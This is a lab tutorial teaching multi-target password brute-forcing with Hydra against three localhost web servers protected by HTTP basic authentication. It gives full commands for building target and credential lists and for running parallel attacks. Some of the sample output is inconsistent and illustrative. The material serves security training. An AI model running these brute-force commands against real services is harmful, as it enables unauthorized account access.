Introduction
In this lab, you will learn how to attack multiple targets simultaneously using Hydra. The lab focuses on utilizing Hydra's capabilities to perform password cracking attempts against a list of target hosts.
The lab guides you through creating a target list file containing IP addresses or hostnames, loading this file into Hydra using the -M option, running a parallel HTTP attack against the targets, and finally, checking the output to identify successful logins across multiple hosts. This hands-on experience will provide you with practical skills in using Hydra for penetration testing and security auditing scenarios.
Create a Target List File
In this step, you will create a target list file. This file will contain a list of target URLs that Hydra will attempt to connect to and crack passwords for. This is a crucial step in any penetration testing or security auditing scenario.
A target list file for HTTP attacks contains URLs instead of just IP addresses. Each line represents a target web service with HTTP basic authentication. In our lab environment, we've set up multiple Apache web servers running on different ports with basic authentication.
All operations in this lab will be performed in the ~/project directory.
First, let's verify that our test web servers are running:
curl -I http://127.0.0.1:8081/ 2> /dev/null | head -1 curl -I http://127.0.0.1:8082/ 2> /dev/null | head -1 curl -I http://127.0.0.1:8083/ 2> /dev/null | head -1HTTP/1.1 401 Unauthorized HTTP/1.1 401 Unauthorized HTTP/1.1 401 UnauthorizedYou should see HTTP response headers indicating the servers are running.
Create the targets file with our test web servers:
cd ~/project echo "127.0.0.1:8081" > targets.txt echo "127.0.0.1:8082" >> targets.txt echo "127.0.0.1:8083" >> targets.txtThis creates a target list with three HTTP services running on localhost at different ports:
- Port 8081: Protected with user
adminand passwordpassword123 - Port 8082: Protected with user
userand passwordsecret - Port 8083: Protected with user
testuserand passwordpassword
- Port 8081: Protected with user
Verify that the file has been created and contains the targets:
cat ~/project/targets.txtYou should see output like:
127.0.0.1:8081 127.0.0.1:8082 127.0.0.1:8083Test one of the protected resources to confirm authentication is required:
curl http://127.0.0.1:8081/You should see an HTTP 401 Unauthorized response, confirming that basic authentication is required.
You have now successfully created a target list file named targets.txt in your ~/project directory with HTTP services that require authentication. This file will be used in the next step to load the targets into Hydra.
Load Targets with -M Option
In this step, you will learn how to load the target list file you created in the previous step into Hydra using the -M option. The -M option tells Hydra to read the list of target hosts from a file. This is particularly useful when you have a large number of targets to test.
For HTTP attacks, the basic syntax is:
hydra -M <target_file> http-get <path>
Where:
<target_file>is the path to the file containing the list of target hosts.http-getspecifies we're attacking HTTP basic authentication using GET requests.<path>is the path on the web server to attack (e.g.,/for the root).
Let's construct a Hydra command to load the targets from the targets.txt file and attack the HTTP basic authentication.
Create username and password lists for our attack:
cd ~/project echo "admin" > users.txt echo "user" >> users.txt echo "testuser" >> users.txt echo "root" >> users.txtThis creates a username list with the actual usernames we configured, plus a common username
root.Create a password list:
echo "password123" > passwords.txt echo "secret" >> passwords.txt echo "password" >> passwords.txt echo "admin" >> passwords.txt echo "123456" >> passwords.txtThis creates a password list containing the actual passwords we configured, plus some common weak passwords.
Now, execute the Hydra command to load the targets from the
targets.txtfile and attempt to crack the HTTP basic authentication:hydra -L ~/project/users.txt -P ~/project/passwords.txt -M ~/project/targets.txt http-get /Expected Results: You should see Hydra attempting to connect to all three HTTP services and successfully cracking the passwords for each:
Hydra v9.x (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-XX-XX XX:XX:XX [DATA] max 16 tasks per 1 server, overall 64 tasks, 60 login tries (l:4/p:5), ~1 try per task [DATA] attacking http-get://127.0.0.1:8081:80/ [DATA] attacking http-get://127.0.0.1:8082:80/ [DATA] attacking http-get://127.0.0.1:8083:80/ [8081][http-get] host: 127.0.0.1 login: admin password: password123 [8082][http-get] host: 127.0.0.1 login: user password: secret [8083][http-get] host: 127.0.0.1 login: testuser password: password 1 of 3 targets completed, 3 valid passwords found Hydra finished.This shows that Hydra successfully found valid credentials for all three HTTP services.
You can also test with a more specific path if needed:
hydra -L ~/project/users.txt -P ~/project/passwords.txt -M ~/project/targets.txt http-get /index.html
In this step, you have successfully learned how to load targets from a file using the -M option in Hydra for HTTP attacks. This is a fundamental skill for performing large-scale password cracking attacks against web services with basic authentication.
Run Parallel HTTP Attack
In this step, you will learn how to run a parallel HTTP attack using Hydra. Running attacks in parallel significantly speeds up the cracking process, especially when dealing with multiple targets. Hydra allows you to specify the number of parallel tasks to run using the -t option.
The -t option controls the number of parallel connections Hydra will make. For HTTP attacks, this is particularly effective since web servers can typically handle multiple concurrent connections better than SSH services.
Let's modify the previous Hydra command to run the HTTP attack with a specified number of threads.
Execute the following Hydra command to run the HTTP attack with 8 threads:
cd ~/project hydra -L users.txt -P passwords.txt -t 8 -M targets.txt http-get /In this command, the
-t 8option tells Hydra to use 8 parallel threads. This means that Hydra will attempt to connect to multiple targets simultaneously and try different username/password combinations in parallel.Expected output:
Hydra v9.x (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-XX-XX XX:XX:XX [DATA] max 8 tasks per 1 server, overall 24 tasks, 60 login tries (l:4/p:5), ~3 try per task [DATA] attacking http-get://127.0.0.1:8081:80/ [DATA] attacking http-get://127.0.0.1:8082:80/ [DATA] attacking http-get://127.0.0.1:8083:80/ [8081][http-get] host: 127.0.0.1 login: admin password: password123 [8082][http-get] host: 127.0.0.1 login: user password: secret [8083][http-get] host: 127.0.0.1 login: testuser password: password 1 of 3 targets completed, 3 valid passwords found Hydra finished.Experiment with different values for the
-toption. Try increasing the number of threads to see how it affects the speed:hydra -L users.txt -P passwords.txt -t 16 -M targets.txt http-get /You might notice that with more threads, the attack completes faster, but the exact timing depends on your system's capabilities.
You can also add verbose output to see more details about the attack process:
hydra -L users.txt -P passwords.txt -t 8 -v -M targets.txt http-get /The
-vflag provides verbose output showing each login attempt, which is useful for understanding exactly what Hydra is testing.For even more detailed output, you can use the
-V(very verbose) option:hydra -L users.txt -P passwords.txt -t 8 -V -M targets.txt http-get /
Important Considerations for HTTP Attacks:
- Web Server Limits: Most web servers can handle many concurrent connections, making HTTP attacks generally faster than other protocols.
- Rate Limiting: Some web applications implement rate limiting that might block rapid authentication attempts.
- Logging: HTTP authentication attempts are typically logged by web servers, making detection easier.
- SSL/HTTPS: For HTTPS targets, you would use
http-getwith SSL-enabled targets orhttps-getfor explicit HTTPS.
In this step, you have successfully learned how to run parallel HTTP attacks using Hydra with the -t option. This technique is particularly effective for web applications with basic authentication.
Check Output for Multiple Hosts
In this step, you will learn how to interpret the output from Hydra when attacking multiple HTTP targets. Hydra's output provides valuable information about the success or failure of the attack attempts across different web services.
When Hydra successfully cracks an HTTP basic authentication password, it displays the credentials in the following format:
[<port>][http-get] host: <host> login: <username> password: <password>
For example:
[8081][http-get] host: 127.0.0.1 login: admin password: password123
This indicates that Hydra successfully cracked the HTTP basic authentication for user admin on host 127.0.0.1 port 8081, with the password password123.
Let's analyze the output from HTTP attacks and understand what different results mean.
Run the complete Hydra attack command again to see the full output:
cd ~/project hydra -L users.txt -P passwords.txt -t 8 -M targets.txt http-get /Examine the detailed output. You should see results for all three targets:
Expected comprehensive output:
Hydra v9.x (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-XX-XX XX:XX:XX [DATA] max 8 tasks per 1 server, overall 24 tasks, 60 login tries (l:4/p:5), ~3 try per task [DATA] attacking http-get://127.0.0.1:8081:80/ [DATA] attacking http-get://127.0.0.1:8082:80/ [DATA] attacking http-get://127.0.0.1:8083:80/ [8081][http-get] host: 127.0.0.1 login: admin password: password123 [8082][http-get] host: 127.0.0.1 login: user password: secret [8083][http-get] host: 127.0.0.1 login: testuser password: password 1 of 3 targets completed, 3 valid passwords found Hydra finished.To see what failed attempts look like, let's create a scenario with some invalid credentials. Create a new password file with mostly wrong passwords:
echo "wrongpass" > wrong_passwords.txt echo "badpass" >> wrong_passwords.txt echo "password123" >> wrong_passwords.txt ## Only one correct passwordRun Hydra with verbose output to see both successful and failed attempts:
hydra -L users.txt -P wrong_passwords.txt -t 4 -v -M targets.txt http-get /You'll see verbose output showing the successful attempt:
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-29 16:22:59 [WARNING] With the -M FILE option you can not specify a server on the commandline. Lets hope you did everything right! [DATA] max 4 tasks per 3 servers, overall 12 tasks, 12 login tries (l:4/p:3), ~3 tries per task [DATA] attacking http-get://(3 targets):80/ [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [8081][http-get] host: 127.0.0.1 login: admin password: password123 [STATUS] attack finished for 127.0.0.1 (waiting for children to complete tests) [STATUS] attack finished for 127.0.0.1 (waiting for children to complete tests) [STATUS] attack finished for 127.0.0.1 (waiting for children to complete tests) 3 of 3 targets successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-29 16:22:59Save the results to a file for later analysis:
hydra -L users.txt -P passwords.txt -t 8 -M targets.txt http-get / -o hydra_results.txtCheck the results file:
cat hydra_results.txt
How to interpret HTTP attack results:
- Successful Attacks: Lines starting with
[port][http-get]show successful credential discoveries - Target Information: Each successful result shows the exact host, port, username, and password
- Summary Statistics: The final line shows how many targets were attacked and how many valid passwords were found
- Failed Attempts: With verbose mode, you can see each failed login attempt
- Output Files: Using
-osaves only successful results to a file for easy analysis
Key differences from other protocols:
- HTTP attacks show the port number clearly in the results
- Response times are usually faster than SSH attacks
- Multiple authentication realms on the same server would appear as different targets
- HTTP status codes (like 401, 403) provide additional context about failures
In this step, you have learned how to interpret Hydra's output when attacking multiple HTTP targets, understand the difference between successful and failed attempts, and save results for analysis. This knowledge is crucial for effective web application security testing.
Summary
In this lab, you learned how to perform multi-target attacks using Hydra against HTTP services with basic authentication. You created a target list file containing multiple web servers running on different ports, each protected with basic authentication using different username and password combinations.
You discovered how to use the -M option to load multiple targets from a file, making it efficient to attack numerous web services simultaneously. The lab demonstrated how to use the -t option to control parallel threads for faster HTTP attacks, and you learned to interpret Hydra's output to identify successful authentication attempts across multiple targets.
This approach is particularly valuable for web application security testing, where you might need to test basic authentication across multiple services, virtual hosts, or different paths on web servers. The techniques you learned provide a foundation for conducting comprehensive security assessments of web applications in containerized environments.
